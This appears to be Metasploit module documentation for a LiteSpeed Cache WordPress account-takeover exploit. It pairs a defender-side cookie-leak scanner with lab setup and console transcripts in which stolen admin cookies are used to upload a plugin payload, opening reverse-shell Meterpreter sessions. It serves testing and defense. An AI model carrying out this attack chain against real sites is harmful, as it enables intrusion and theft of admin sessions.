Vulnerable Application
This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a WordPress plugin that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging feature is enabled, the plugin logs admin cookies to /wp-content/debug.log, a file that is accessible without authentication. The Debug Logging feature is not enabled by default. The admin cookies found in debug.log can be used to upload and execute a malicious plugin containing a payload.
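Added example, not code from this module or from the LiteSpeed plugin: a defender-side scanner that checks a copy of debug.log for WordPress auth cookies and reports them with their values masked, plus a small classifier for the result of fetching the file from your own site. The log lines are constructed samples; the cookie names follow WordPress's real naming (prefix plus a 32-hex COOKIEHASH), but the surrounding LiteSpeed log format is assumed.

```python
from __future__ import annotations
import re
from typing import NamedTuple

# WordPress names its auth cookies <prefix> + COOKIEHASH (md5 of the site URL):
# wordpress_<hash>, wordpress_sec_<hash> and wordpress_logged_in_<hash>.
AUTH_COOKIE_RE = re.compile(
    r"(?P<name>wordpress_(?:sec_|logged_in_)?[0-9a-f]{32})=(?P<value>[^;\s\"']+)"
)


class LeakedCookie(NamedTuple):
    line_no: int
    name: str
    username: str  # first field of the cookie value is the WordPress login name
    redacted: str  # the log line with cookie values masked, safe to paste into a ticket


def find_leaked_cookies(log_text: str) -> list[LeakedCookie]:
    """Scan the contents of a debug.log copy for WordPress auth cookies."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        matches = list(AUTH_COOKIE_RE.finditer(line))
        if not matches:
            continue
        redacted = AUTH_COOKIE_RE.sub(lambda m: f"{m.group('name')}=<REDACTED>", line)
        for m in matches:
            # Cookie value is "user|expiry|token|hmac", usually URL-encoded (%7C = '|').
            username = re.split(r"%7C|\|", m.group("value"), maxsplit=1, flags=re.I)[0]
            hits.append(LeakedCookie(line_no, m.group("name"), username, redacted))
    return hits


def assess_exposure(status_code: int, body: str) -> str:
    """Classify an unauthenticated GET of /wp-content/debug.log against your own site."""
    if status_code != 200:
        return "not reachable"  # file absent or blocked at the web server: good
    return "exposed" if find_leaked_cookies(body) else "reachable"


# Constructed sample log (the LiteSpeed line format is assumed, not copied from the plugin).
SAMPLE_LOG = """\
[09/11/24 23:10:01.123] [x] GET /wp-admin/
[09/11/24 23:10:01.124] [x] Cookie: wordpress_logged_in_0123456789abcdef0123456789abcdef=admin%7C1726200000%7Cabc%7Cdef; wp-settings-1=posts_list_mode%3Dlist
[09/11/24 23:10:02.000] [x] cache miss for /
"""

if __name__ == "__main__":
    for hit in find_leaked_cookies(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.name} for user '{hit.username}'")
    print(assess_exposure(200, SAMPLE_LOG))  # exposed
```

A result of "exposed" or "reachable" means the log is served to anonymous clients; besides turning Debug Log off and updating to 6.5.0.1 or later, deny /wp-content/debug.log at the web server and rotate any sessions whose cookies appeared in it.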
Setup
Spin up a WordPress container with the following docker-compose file:
```yaml
version: '3.8'
services:
  db:
    image: mysql:latest
    volumes:
      - db_data:/var/lib/mysql
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: example_root_password
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress_user
      MYSQL_PASSWORD: example_password
  wordpress:
    depends_on:
      - db
    image: wordpress:latest
    ports:
      - "8000:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wordpress_user
      WORDPRESS_DB_PASSWORD: example_password
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wordpress_data:/var/www/html
volumes:
  db_data:
  wordpress_data:
```
Download, install and activate the vulnerable LiteSpeed Cache plugin from https://downloads.wordpress.org/plugin/litespeed-cache.6.3.zip
Once installed, a LiteSpeed menu item should appear on the left-hand side of the WordPress admin. Clicking it opens a drop-down menu. Select "ToolBox", then "Debug Settings", and switch the "Debug Log" feature to "On".
Sign out of WordPress; when you reauthenticate, your admin cookie will be logged to /wp-content/debug.log.
Verification Steps
- Start msfconsole
- Do: `use multi/http/wp_litespeed_cookie_theft`
- Set the `RHOST`, `LHOST` and `RPORT`
- Run the module
- Receive a Meterpreter session in the context of the user running the WordPress site.
Scenarios
ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
```
msf exploit(multi/http/wp_litespeed_cookie_theft) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] One or more potential admin cookies were found
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/qSNzhabMTP/OiDynMUetY.php...
[*] Sending stage (39927 bytes) to 192.168.1.67
[+] Deleted OiDynMUetY.php
[+] Deleted qSNzhabMTP.php
[+] Deleted ../qSNzhabMTP
[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.67:64935) at 2024-09-11 23:18:14 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 29292f368fe3
OS          : Linux 29292f368fe3 6.10.4-linuxkit #1 SMP PREEMPT_DYNAMIC Mon Aug 12 08:48:58 UTC 2024 x86_64
Meterpreter : php/linux
```
ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
```
msf exploit(multi/http/wp_litespeed_cookie_theft) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] One or more potential admin cookies were found
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/IVStOPtwuq/WvXecICkgw.php...
[*] Sending stage (3045380 bytes) to 192.168.1.67
[+] Deleted WvXecICkgw.php
[+] Deleted IVStOPtwuq.php
[+] Deleted ../IVStOPtwuq
[*] Meterpreter session 6 opened (192.168.1.67:4444 -> 192.168.1.67:64884) at 2024-09-11 23:14:49 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.22.0.3
OS           : Debian 12.5 (Linux 6.10.4-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```